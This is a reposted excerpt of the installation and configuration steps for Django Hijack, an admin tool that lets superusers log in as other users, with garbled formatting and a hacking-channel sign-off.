2) In your settings.py, add hijack and the dependency compat to your installed apps:
INSTALLEDAPPS = (
...,
'hijack',
'compat',
)
3) Finally, add the Django Hijack URLs to urls.py:
urlpatterns = [
...
url(r'^hijack/', include('hijack.urls', namespace='hijack')),
]
4) After installing
Setting up redirections
> You should specify a HIJACKLOGINREDIRECTURL and a HIJACKLOGOUTREDIRECTURL. This is where admins are redirected to after hijacking or releasing a user. Both settings default to LOGINREDIRECTURL.
# settings.py
HIJACKLOGINREDIRECTURL = '/profile/' # Where admins are redirected to after hijacking a user
HIJACKLOGOUTREDIRECTURL = '/admin/auth/user/' # Where admins are redirected to after releasing a user
5) Setting up the notification bar
We strongly recommend displaying a notification bar to everyone who is hijacking another user. This reduces the risk of an admin hijacking someone inadvertently or forgetting to release the user afterwards.
6) To set up the notification bar, add the following lines to your base.html or to another template in which you want the notification bar to be displayed.
<!-- At the top -->
{% load staticfiles %}
{% load hijacktags %}
...
<!-- In the head -->
<link rel="stylesheet" type="text/css" href="{% static 'hijack/hijack-styles.css' %}" />
...
<!-- Directly after <body> -->
{% hijacknotification %}
...
7) If your project uses Bootstrap you may want to set HIJACKUSEBOOTSTRAP = True in your project settings. Django Hijack will display a Bootstrap notification bar that does not overlap with the default navbar.
8) Generic template filter
We also provide a generic template filter to check if you are currently hijacking a user. This is useful for displaying/hiding elements besides the notification bar.
{% load hijacktags %}
{% if request|ishijacked %}
...
{% endif %}
9) The following URLs are available by default:
/hijack/<user id>
/hijack/username/<username>
/hijack/email/<user email>
10) If the hijacking is successful, the user is redirected to the HIJACKLOGINREDIRECTURL, and the yellow notification bar is displayed at the top of the landing page.
Here is a reference implementation of a button that allows a superuser to hijack the user referenced by the context variable user:
action="/hijack/{{ user.id }}/" method="post">
{% csrf_token %}
<button type="submit">Hijack {{ user.username }}</button>
</form>
more on : https://django-hijack.readthedocs.io/en/stable/E N J O Y β€οΈππ»
U S E F O R L E A R N
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
django-hijack.readthedocs.io
Django Hijack
Django Hijack allows superusers to hijack (=login as) and work on behalf of another user.